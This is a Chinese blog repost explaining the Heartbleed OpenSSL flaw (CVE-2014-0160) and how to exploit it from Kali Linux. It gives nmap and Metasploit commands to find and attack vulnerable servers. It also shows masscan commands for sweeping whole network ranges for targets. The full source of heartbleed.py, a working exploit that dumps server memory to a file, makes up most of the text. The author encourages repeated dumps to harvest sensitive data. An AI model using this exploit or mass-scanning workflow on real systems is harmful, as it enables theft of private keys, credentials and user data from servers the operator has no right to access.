Hearbleed Hacking In Kali-linux

最新推荐文章于 2022-08-15 16:19:39 发布

小小阿金

最新推荐文章于 2022-08-15 16:19:39 发布

阅读量1.2k

点赞数

分类专栏：网络安全文章标签： Hearbleed kali

网络安全专栏收录该内容

24 篇文章 1 订阅

订阅专栏

转自 Linux折腾笔记

前段时间Heartbleed漏洞(CVE-2014-0160)造成的恐慌几乎席卷全球，各大网站的安全部门也是遇到了从未有过的危机，，，简单解释下就是 “用户通过TSL 加密链接向服务器发起 Client Hello询问，测服务器是否正常在线干活(形象的比喻就是心脏脉搏)，服务器发回Server hello，表明正常建立SSL通信。每次询问都会附加一个询问的字符长度pad length，bug来了，如果这个pad length大于实际的长度，服务器还是会返回同样规模的字符信息，于是造成了内存里信息的越界访问...”

接下来这里就演示下分别用两个工具利用心脏出血漏洞读取服务器内存信息。因为内存里的信息不是一成不变的，所以不是每次都会出好东西的，所以大家多爆几次。

工具1：nmap+msfconsole
非常实用的hack工具组合，首先得升级msfconsole至最新版，然后给nmap添加一个针对heartbleed的扫描脚本，用来发现心脏出血漏洞：

cd /usr/share/nmap/scripts/ wget https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse cd /usr/share/nmap/nselib/ wget https://svn.nmap.org/nmap/nselib/tls.lua nmap --script-updatedb

添加成功之后扫描一个没有更新openssl的网站：
nmap -n -p 443 -Pn --script=ssl-heartbleed servers_ip
出现如下漏洞信息：

Nmap scan report for xxx.yyy (xxx_ip)
Host is up (0.071s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       http://cvedetails.com/cve/2014-0160/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_      http://www.openssl.org/news/secadv_20140407.txt 

 
 
  
  
 
 
 
然后msfconsole载入 auxiliary/scanner/ssl/openssl_heartbleed 模块：

msf > use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS xxx_ip
set RPORT 443
set VERBOSE true
exploit


工具2：hearbleed.py
这个漏洞刚发布不久，就有很多人写了攻击脚本软件等，这里介绍一个使用比较广的python小脚本：‘heartbleed.py’，这个脚本在youtube上有很多人做了演示视频，有兴趣可以去看看,日志最后我会符上这个脚本的代码。使用方法：
python heartbleed.py server_ip
root@mtx:~# python heartbleed.py xxx-ip
Scanning xxx-ip on port 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 759
 ... received message: type = 22, ver = 0302, length = 397
 ... received message: type = 22, ver = 0302, length = 4
Server TLS version was 1.2

Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
...................


批量扫描：
怎么批量发现漏洞服务器，这里给大家推荐一个扫描神器：masscan，号称24小时扫遍全网络！当然实际使用看是靠自己的宽带的。使用方法：
masscan -p443 x.x.x.x/y -oL port443.list                #对网段x.x.x.x/y批量扫描开启443端口的ip，保存为port443.list
nmap -iL port443.list -p 443 --script=ssl-heartbleed       #nmap调用脚本扫描这些地址里有heartbleed漏洞的ip
24小时扫遍全网络哟，很淫荡吧！

附件：heartbleed.py
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
import smtplib

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)')
options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory too (default: dump.bin)')
options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hbv10 = h2bin('''
18 03 01 00 03
01 40 00
''')

hbv11 = h2bin('''
18 03 02 00 03
01 40 00
''')

hbv12 = h2bin('''
18 03 03 00 03
01 40 00
''')

def hexdump(s, dumpf, quiet):
    dump = open(dumpf,'a')
    dump.write(s)
    dump.close()
    if quiet: return
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            if not rdata:
                return None
            else:
                return rdata
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s, dumpf, host, quiet):
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received from '+host+', server likely not vulnerable'
            return False

        if typ == 24:
            if not quiet: print 'Received heartbeat response:'
            hexdump(pay, dumpf, quiet)
            if len(pay) > 3:
                print 'WARNING: server '+ host +' returned more data than it should - server is vulnerable!'
            else:
                print 'Server '+host+' processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            if not quiet: print 'Received alert:'
            hexdump(pay, dumpf, quiet)
            print 'Server '+ host +' returned error, likely not vulnerable'
            return False

def connect(host, port, quiet):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if not quiet: print 'Connecting...'
    sys.stdout.flush()
    s.connect((host, port))
    return s

def tls(s, quiet):
    if not quiet: print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    if not quiet: print 'Waiting for Server Hello...'
    sys.stdout.flush()

def parseresp(s):
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return 0
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            return ver

def check(host, port, dumpf, quiet, starttls):
    response = False
    if starttls:
        try:
            s = smtplib.SMTP(host=host,port=port)
            s.ehlo()
            s.starttls()
        except smtplib.SMTPException:
            print 'STARTTLS not supported...'
            s.quit()
            return False
        print 'STARTTLS supported...'
        s.quit()
        s = connect(host, port, quiet)
        s.settimeout(1)
        try:
            re = s.recv(1024)
            s.send('ehlo starttlstest\r\n')
            re = s.recv(1024)
            s.send('starttls\r\n')
            re = s.recv(1024)
        except socket.timeout:
            print 'Timeout issues, going ahead anyway, but it is probably broken ...'
        tls(s,quiet)
    else:
        s = connect(host, port, quiet)
        tls(s,quiet)

    version = parseresp(s)

    if version == 0:
        if not quiet: print "Got an error while parsing the response, bailing ..."
        return False
    else:
        version = version - 0x0300
        if not quiet: print "Server TLS version was 1.%d\n" % version

    if not quiet: print 'Sending heartbeat request...'
    sys.stdout.flush()
    if (version == 1):
        s.send(hbv10)
        response = hit_hb(s,dumpf, host, quiet)
    if (version == 2):
        s.send(hbv11)
        response = hit_hb(s,dumpf, host, quiet)
    if (version == 3):
        s.send(hbv12)
        response = hit_hb(s,dumpf, host, quiet)
    s.close()
    return response

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    print 'Scanning ' + args[0] + ' on port ' + str(opts.port)
    for i in xrange(0,opts.num):
        check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)

if __name__ == '__main__':
    main()

小小阿金

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Hearbleed Hacking In Kali-linux

转自Linux折腾笔记前段时间Heartbleed漏洞(CVE-2014-0160)造成的恐慌几乎席卷全球，各大网站的安全部门也是遇到了从未有过的危机，，，简单解释下就是 “用户通过TSL 加密链接向服务器发起 Client Hello询问，测服务器是否正常在线干活(形象的比喻就是心脏脉搏)，服务器发回Server hello，表明正常建立SSL通信。每次询问都会附加一个询
复制链接

扫一扫